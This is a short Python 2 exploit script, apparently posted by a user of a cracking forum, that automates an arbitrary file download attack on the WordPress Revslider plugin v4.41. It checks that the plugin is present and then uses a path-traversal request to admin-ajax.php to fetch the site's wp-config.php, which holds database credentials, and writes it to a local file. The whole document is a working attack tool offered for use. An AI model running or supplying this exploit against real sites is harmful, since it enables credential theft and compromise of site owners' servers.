[lubov] Wordpress Revslider Exploit

1. #!/usr/bin/python
2. # author: lubov
3.  
4. '''
5. Affected Software: Wordpress Plugin: Revslider v4.41
6. Type of exploitation: Arbitrary File Download
7.  
8. This script helps automate the exploitation of Wordpress plugin: Revslider in order
9. to obtain the website's wordpress config (or) the server's /etc/passwd (if Linux).
10.  
11. Source: https://www.exploit-db.com/exploits/36554/
12. '''
13. import requests, sys
14. from urlparse import urlparse
15. def logo():
16.     print '''\
17.             *                  *
18.             __                *
19.          ,db'    *     *
20.         ,d8/       *        *    *
21.         888
22.         `db\      *     *
23.           `o`_                    **
24.      *               *   *    _      *
25.            *                 / )
26.         *    (\__/) *       ( (  *
27.       ,-.,-.,)    (.,-.,-.,-.) ).,-.,-.
28.      | @|  ={      }= | @|  / / | @|o |
29.     _j__j__j_)     `-------/ /__j__j__j_
30.     ________(               /___________
31.      |  | @| \             || o|O | @|
32.      |o |  |,'\      ,   ,'"|  |  |  |  hjw
33.     vV\|/vV|`-'\ ,---\  | \Vv\hjwVv\//v
34.                _) )    `. \ /
35.               (__/       ) )
36.                         (_/
37.  
38.                Revslider Exploiter
39.                     by: lubov (https://www.nulled.to/user/1242037-lubov)
40.     '''
41.  
42. def usage():
43.     print("Usage: %s http(s)://vuln-url.com") % (sys.argv[0])
44.     quit()
45.  
46. def filename_gen(f_host):
47.     f_host = urlparse(f_host)
48.     return f_host.netloc
49.  
50. def write(f_name, content):
51.     with open(f_name+'.txt', 'wb') as f:
52.         for chunk in content.iter_content(chunk_size=128):
53.             f.write(chunk)
54.     f.close()
55.  
56. def exploit(host):
57.     print("[+][+] Attempting to obtain wp-config from: %s") % (host)
58.     r = requests.get(host + '/wp-content/plugins/revslider')
59.     if r.status_code == requests.codes.ok:
60.         print("[+][+] The website is running the Revslider Plugin.")
61.     else:
62.         print("[-][-] The website is not running the plugin.")
63.         quit()
64.     x = requests.get(host+'/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php')
65.     return x
66.  
67. def main():
68.     if (len(sys.argv) < 2):
69.         usage()
70.     url = sys.argv[1]
71.     try:
72.         if (url.split(":")[0]):
73.             pass
74.     except IndexError:
75.         print("[-][-] Missing URL Schema. (http/https).")
76.         quit()
77.     config = exploit(url)
78.     filename = filename_gen(url)
79.     write(filename, config)
80.     print("[+][+] Config has been successfully been written to %s.txt") % (filename)
81.  
82. if __name__ == '__main__':
83.     logo()
84.     main()